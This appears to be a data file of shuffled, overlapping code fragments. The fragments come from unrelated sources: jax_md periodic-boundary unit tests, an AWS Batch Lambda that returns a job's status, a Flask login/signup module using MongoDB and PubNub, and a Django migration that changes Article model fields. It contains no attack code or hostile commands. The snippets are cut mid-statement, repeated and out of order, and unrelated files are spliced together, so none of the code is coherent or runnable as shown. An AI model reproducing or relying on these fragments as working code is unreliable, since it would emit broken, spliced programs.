space.periodic_general(jnp.eye(spatial_dimension)) metric =", "jnp.array(size_1 * (eye + dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0)", "self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R = random.uniform( split2,", "d_gf, s_gf = space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key", "R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R,", "space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for _ in range(SHIFT_STEPS): key,", "dR = random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R),", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) 
self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list(", "and # limitations under the License. \"\"\"Tests for jax_md.space.\"\"\" from", "s_g = space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f = random.uniform(key,", "self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose(", "dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R,", "3) dT = random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T =", "2): dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype) dr_shifted", "jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10", "# limitations under the License. \"\"\"Tests for jax_md.space.\"\"\" from absl.testing", "R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T = random.normal(", "= grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list(", "= jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f,", "dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "\"License\"); # you may not use this file except in", "assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "= \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R))", "unwrapped_shift = space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for _ in", "} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE for", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled = R * box_size dR =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key", "box_format): if box_format == 'scalar': raise SkipTest('Scalar case fails due", "random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split = random.split(key) R", "spatial_dimension)) R_prime = space.transform(T, R) energy_direct = lambda R: jnp.sum(R", "dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key =", "= random.uniform(key, (N, dim), dtype=dtype) R = space.transform(box, R_f) E", "dR) dR = jnp.where(dR < -0.49, f32(-0.49), dR) R_shift =", "R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R,", "if dtype is f32: tol = 2e-5 for _ in", "box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N =", "spatial_dimension, dtype, box_format): N = 16 R_f, R, box, (s," ]
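# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the test file above): a minimal example
# of the API these tests exercise. `space.periodic_general` returns a
# displacement function and a shift function for a general affine box, with
# positions in fractional coordinates by default, and `space.map_product`
# lifts the pairwise displacement over all pairs. Box size and particle count
# below are arbitrary illustration values.
# ---------------------------------------------------------------------------
import jax.numpy as jnp
from jax import random
from jax_md import space

box = 10.0 * jnp.eye(2)                         # 2D box given as an affine transform
displacement, shift = space.periodic_general(box)

R = random.uniform(random.PRNGKey(0), (10, 2))  # fractional coordinates in [0, 1)
dR_all = space.map_product(displacement)(R, R)  # (10, 10, 2) minimum-image displacements
R_next = shift(R, 0.01 * random.normal(random.PRNGKey(1), R.shape))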
[ "<filename>functions/batch-custom-action/status-api/lambda.py import boto3 batch_client = boto3.client('batch') def lambda_handler(event, context): describe_response", "lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')] ) return", "batch_client = boto3.client('batch') def lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[", "boto3 batch_client = boto3.client('batch') def lambda_handler(event, context): describe_response = batch_client.describe_jobs(", "= boto3.client('batch') def lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId',", "def lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')] )", "context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')] ) return describe_response.get('jobs',", "describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')] ) return describe_response.get('jobs', [{}])[0].get('status',", "boto3.client('batch') def lambda_handler(event, context): describe_response = batch_client.describe_jobs( jobs=[ event.get('jobId', '')]", "= batch_client.describe_jobs( jobs=[ event.get('jobId', '')] ) return describe_response.get('jobs', [{}])[0].get('status', '')", "import boto3 batch_client = boto3.client('batch') def lambda_handler(event, context): describe_response =" ]
[ "Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form =", "methods=['GET', 'POST']) def signup(): form = SignupForm(request.form) error = None", "app, _callback from .models import User from .forms import LoginForm,", "from app import db, login_manager, pubnub, app, _callback from .models", "not user: error = 'User does not exist' elif not", "def signup(): form = SignupForm(request.form) error = None if request.method", ".forms import LoginForm, SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET',", "'POST': existing_user = db.users.find_one({'username' : request.form['username']}) if existing_user: error =", "exist' elif not check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials. Please", "login(): form = LoginForm(request.form) error = None print(request.method) if request.method", "'POST']) def signup(): form = SignupForm(request.form) error = None if", "generate_password_hash from app import db, login_manager, pubnub, app, _callback from", "'Username already exists' else: new_user = {'username' : request.form['username'], 'email'", "== 'POST': user = db.users.find_one({'username': request.form['username']}) if not user: error", "@login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username): u =", "from flask import Blueprint, render_template, redirect, url_for, request, flash from", "'User does not exist' elif not check_password_hash(user['password'], request.form['password']): error =", "else: user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log", "SignupForm(request.form) error = None if request.method == 'POST': existing_user =", "= None if request.method == 'POST': existing_user = db.users.find_one({'username' :", "= 'Username already exists' else: new_user = {'username' : request.form['username'],", "def logout(): logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback():", "render_template('auth/login.html', title='Log In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST'])", "request.form['username'], 'email' : request.form['email'], 'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])}", "login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to Hydrosmart', form=form,", "u = db.users.find_one({'username': username}) if not u: return None return", "try again.' 
else: user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return", "request.form['email'], 'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user =", "__name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login(): form = LoginForm(request.form) error", "= db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True,", "pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html',", "db.users.find_one({'username' : request.form['username']}) if existing_user: error = 'Username already exists'", ": request.form['username']}) if existing_user: error = 'Username already exists' else:", "error = None print(request.method) if request.method == 'POST': user =", "unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username): u = db.users.find_one({'username': username})", "pubnub, app, _callback from .models import User from .forms import", "from .forms import LoginForm, SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login',", "= db.users.find_one({'username' : request.form['username']}) if existing_user: error = 'Username already", "= Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login(): form =", "@login_manager.user_loader def load_user(username): u = db.users.find_one({'username': username}) if not u:", "'email' : request.form['email'], 'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user)", "= None print(request.method) if request.method == 'POST': user = db.users.find_one({'username':", "flash from flask.ext.login import login_required, login_user, logout_user from werkzeug import", "login_required, login_user, logout_user from werkzeug import check_password_hash, generate_password_hash from app", "'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username':", "Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout():", "db, login_manager, pubnub, app, _callback from .models import User from", "out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def", "= db.users.find_one({'username': request.form['username']}) if not user: error = 'User does", "def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username): u = db.users.find_one({'username':", "already exists' else: new_user = {'username' : request.form['username'], 'email' :", "render_template, redirect, url_for, request, flash from flask.ext.login import login_required, login_user,", "def load_user(username): u = db.users.find_one({'username': username}) if not u: return", "= LoginForm(request.form) error = None print(request.method) if request.method == 'POST':", "check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials. 
Please try again.' else:", "write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up", "'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username'])", "@mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler", "'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged out.\") return redirect('/login')", "logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login')", "Blueprint, render_template, redirect, url_for, request, flash from flask.ext.login import login_required,", "import check_password_hash, generate_password_hash from app import db, login_manager, pubnub, app,", "check_password_hash, generate_password_hash from app import db, login_manager, pubnub, app, _callback", "generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'],", "logout(): logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return", "if request.method == 'POST': existing_user = db.users.find_one({'username' : request.form['username']}) if", "db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0)", "request.form['password']): error = 'Invalid credentials. Please try again.' 
else: user_obj", "= 'User does not exist' elif not check_password_hash(user['password'], request.form['password']): error", "<reponame>ifaraag/app<filename>app/auth/views.py<gh_stars>0 from flask import Blueprint, render_template, redirect, url_for, request, flash", "app import db, login_manager, pubnub, app, _callback from .models import", "LoginForm(request.form) error = None print(request.method) if request.method == 'POST': user", "manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up for", "return render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin',", "else: new_user = {'username' : request.form['username'], 'email' : request.form['email'], 'zip'", "pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard'))", "for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def", "title='Log In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def", "error = 'Invalid credentials. Please try again.' else: user_obj =", "new_user = {'username' : request.form['username'], 'email' : request.form['email'], 'zip' :", "Please try again.' else: user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices'))", "login_user, logout_user from werkzeug import check_password_hash, generate_password_hash from app import", "= {'username' : request.form['username'], 'email' : request.form['email'], 'zip' : request.form['zip'],", "In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup():", "if not user: error = 'User does not exist' elif", "to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form", "{'username' : request.form['username'], 'email' : request.form['email'], 'zip' : request.form['zip'], 'password'", "user: error = 'User does not exist' elif not check_password_hash(user['password'],", "credentials. Please try again.' 
else: user_obj = User(user['username']) login_user(user_obj) return", "redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup',", ": request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']})", "does not exist' elif not check_password_hash(user['password'], request.form['password']): error = 'Invalid", "return None return User(u['username']) def callback(message, channel): db.data.insert_one(message) def error(message):", "flask import Blueprint, render_template, redirect, url_for, request, flash from flask.ext.login", "@mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged out.\")", "methods=['GET', 'POST']) def login(): form = LoginForm(request.form) error = None", "signup(): form = SignupForm(request.form) error = None if request.method ==", "mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login(): form", "form=form, title='Sign Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST'])", "@mod_auth.route('/login', methods=['GET', 'POST']) def login(): form = LoginForm(request.form) error =", "werkzeug import check_password_hash, generate_password_hash from app import db, login_manager, pubnub,", "import db, login_manager, pubnub, app, _callback from .models import User", "user = db.users.find_one({'username': request.form['username']}) if not user: error = 'User", "flask.ext.login import login_required, login_user, logout_user from werkzeug import check_password_hash, generate_password_hash", "load_user(username): u = db.users.find_one({'username': username}) if not u: return None", "u: return None return User(u['username']) def callback(message, channel): db.data.insert_one(message) def", "import login_required, login_user, logout_user from werkzeug import check_password_hash, generate_password_hash from", "error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form = SignupForm(request.form) error", "auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form,", "form = LoginForm(request.form) error = None print(request.method) if request.method ==", "existing_user = db.users.find_one({'username' : request.form['username']}) if existing_user: error = 'Username", "_callback from .models import User from .forms import LoginForm, SignupForm", "error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user()", "existing_user: error = 'Username already exists' else: new_user = {'username'", "redirect('/login') @login_manager.user_loader def load_user(username): u = db.users.find_one({'username': username}) if not", "import Blueprint, render_template, redirect, url_for, request, flash from flask.ext.login import", "methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged out.\") return", "SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login():", "from flask.ext.login import login_required, login_user, logout_user from werkzeug import check_password_hash,", "return 
redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart', error=error)", "'POST': user = db.users.find_one({'username': request.form['username']}) if not user: error =", "username}) if not u: return None return User(u['username']) def callback(message,", "request.method == 'POST': user = db.users.find_one({'username': request.form['username']}) if not user:", "request.form['username']}) if existing_user: error = 'Username already exists' else: new_user", "def login(): form = LoginForm(request.form) error = None print(request.method) if", "not exist' elif not check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials.", "# @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required def logout(): logout_user() flash(\"Logged", "= User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to", "request.form['username']}) if not user: error = 'User does not exist'", "exists' else: new_user = {'username' : request.form['username'], 'email' : request.form['email'],", "form = SignupForm(request.form) error = None if request.method == 'POST':", "redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart', error=error) #", "form=form, error=error) @mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form = SignupForm(request.form)", "read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign", "return render_template('auth/login.html', title='Log In to Hydrosmart', form=form, error=error) @mod_auth.route('/signup', methods=['GET',", "User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to Hydrosmart',", "error = 'Username already exists' else: new_user = {'username' :", "ttl=0) return redirect(url_for('dashboard.dashboard')) return render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart',", "request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'],", "None return User(u['username']) def callback(message, channel): db.data.insert_one(message) def error(message): db.data.insert_one(message)", "not check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials. 
Please try again.'", "= SignupForm(request.form) error = None if request.method == 'POST': existing_user", ".models import User from .forms import LoginForm, SignupForm mod_auth =", "Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\") @login_required", ": request.form['username'], 'email' : request.form['email'], 'zip' : request.form['zip'], 'password' :", "= db.users.find_one({'username': username}) if not u: return None return User(u['username'])", "request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return", "= 'Invalid credentials. Please try again.' else: user_obj = User(user['username'])", "from werkzeug import check_password_hash, generate_password_hash from app import db, login_manager,", "'POST']) def login(): form = LoginForm(request.form) error = None print(request.method)", "db.users.find_one({'username': request.form['username']}) if not user: error = 'User does not", "if request.method == 'POST': user = db.users.find_one({'username': request.form['username']}) if not", "== 'POST': existing_user = db.users.find_one({'username' : request.form['username']}) if existing_user: error", "redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username): u", "if existing_user: error = 'Username already exists' else: new_user =", "Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def login(): form = LoginForm(request.form)", "elif not check_password_hash(user['password'], request.form['password']): error = 'Invalid credentials. Please try", "None print(request.method) if request.method == 'POST': user = db.users.find_one({'username': request.form['username']})", "not u: return None return User(u['username']) def callback(message, channel): db.data.insert_one(message)", "return redirect('/login') @login_manager.user_loader def load_user(username): u = db.users.find_one({'username': username}) if", "print(request.method) if request.method == 'POST': user = db.users.find_one({'username': request.form['username']}) if", "db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True,", "user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In", "again.' 
else: user_obj = User(user['username']) login_user(user_obj) return redirect(url_for('devices.list_devices')) return render_template('auth/login.html',", "db.users.find_one({'username': username}) if not u: return None return User(u['username']) def", "error = 'User does not exist' elif not check_password_hash(user['password'], request.form['password']):", "None if request.method == 'POST': existing_user = db.users.find_one({'username' : request.form['username']})", "url_for, request, flash from flask.ext.login import login_required, login_user, logout_user from", "LoginForm, SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST']) def", "request.method == 'POST': existing_user = db.users.find_one({'username' : request.form['username']}) if existing_user:", "user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True,", "flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader", "if not u: return None return User(u['username']) def callback(message, channel):", "User from .forms import LoginForm, SignupForm mod_auth = Blueprint('auth', __name__)", "return redirect(url_for('devices.list_devices')) return render_template('auth/login.html', title='Log In to Hydrosmart', form=form, error=error)", "error = None if request.method == 'POST': existing_user = db.users.find_one({'username'", "import User from .forms import LoginForm, SignupForm mod_auth = Blueprint('auth',", "redirect, url_for, request, flash from flask.ext.login import login_required, login_user, logout_user", "title='Sign Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET', 'POST']) @mod_auth.route(\"/logout\")", "import LoginForm, SignupForm mod_auth = Blueprint('auth', __name__) @mod_auth.route('/login', methods=['GET', 'POST'])", ": request.form['email'], 'zip' : request.form['zip'], 'password' : generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user", "login_manager, pubnub, app, _callback from .models import User from .forms", "@login_required def logout(): logout_user() flash(\"Logged out.\") return redirect('/login') @login_manager.unauthorized_handler def", "request, flash from flask.ext.login import login_required, login_user, logout_user from werkzeug", "@mod_auth.route('/signup', methods=['GET', 'POST']) def signup(): form = SignupForm(request.form) error =", "return redirect('/login') @login_manager.unauthorized_handler def unauthorized_callback(): return redirect('/login') @login_manager.user_loader def load_user(username):", "render_template('auth/signup.html', form=form, title='Sign Up for Hydrosmart', error=error) # @mod_auth.route('/googlelogin', methods=['GET',", "channel=user['username']) pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0) return redirect(url_for('dashboard.dashboard')) return", ": generate_password_hash(request.form['password'])} db.users.insert_one(new_user) user = db.users.find_one({'username': request.form['username']}) pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username']) pubnub.grant(channel=user['username'],", "logout_user from werkzeug import 
check_password_hash, generate_password_hash from app import db,", "'Invalid credentials. Please try again.' else: user_obj = User(user['username']) login_user(user_obj)", "from .models import User from .forms import LoginForm, SignupForm mod_auth" ]
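The User class imported from .models is not part of this module. A minimal sketch of what it plausibly looks like, assuming Flask-Login's UserMixin supplies the session hooks (is_authenticated, is_active, is_anonymous) and only get_id() needs overriding, since load_user() above keys sessions on the username:

# Hypothetical sketch of the .models User class; the real implementation is
# not shown in this file.
from flask_login import UserMixin


class User(UserMixin):
    def __init__(self, username):
        self.username = username

    def get_id(self):
        # load_user() looks the user up by username, so the value stored in
        # the session must round-trip the username unchanged.
        return self.username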
[ "migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True,", "Generated by Django 1.10.6 on 2017-04-06 06:02 from __future__ import", "-*- # Generated by Django 1.10.6 on 2017-04-06 06:02 from", "), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url',", "migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True,", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('economist',", "field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article',", "[ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category',", "migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True),", "Django 1.10.6 on 2017-04-06 06:02 from __future__ import unicode_literals from", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'),", "Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'), ] operations = [", "null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article',", "model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True),", "[ ('economist', '0002_auto_20170406_1153'), ] operations = [ migrations.AlterField( model_name='article', name='alternativename',", "migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False),", "coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-04-06", "name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True,", "models class Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'), ] operations", "), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', 
name='fly_title',", "= [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article',", "model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField( model_name='article', name='source', field=models.TextField(blank=True, null=True), ),", "name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ),", "# -*- coding: utf-8 -*- # Generated by Django 1.10.6", "migrations, models class Migration(migrations.Migration): dependencies = [ ('economist', '0002_auto_20170406_1153'), ]", "model_name='article', name='fly_title', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True),", "migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article', name='spider', field=models.TextField(editable=False), ),", "<filename>economist/migrations/0003_auto_20170406_1402.py # -*- coding: utf-8 -*- # Generated by Django", "06:02 from __future__ import unicode_literals from django.db import migrations, models", "model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True),", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "('economist', '0002_auto_20170406_1153'), ] operations = [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True,", "migrations.AlterField( model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False),", "name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ), migrations.AlterField(", "model_name='article', name='headline', field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='project', field=models.TextField(editable=False), ),", "null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article', name='spider',", "), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article', name='spider', field=models.TextField(editable=False),", "field=models.TextField(blank=True, null=True), ), migrations.AlterField( model_name='article', name='source_url', field=models.URLField(editable=False), ), migrations.AlterField( model_name='article',", "utf-8 -*- # Generated by Django 1.10.6 on 2017-04-06 06:02", "operations = [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ), migrations.AlterField(", "] operations = [ migrations.AlterField( model_name='article', name='alternativename', field=models.TextField(blank=True, null=True), ),", "null=True), ), migrations.AlterField( model_name='article', name='category', field=models.TextField(blank=True, null=True), ), migrations.AlterField( 
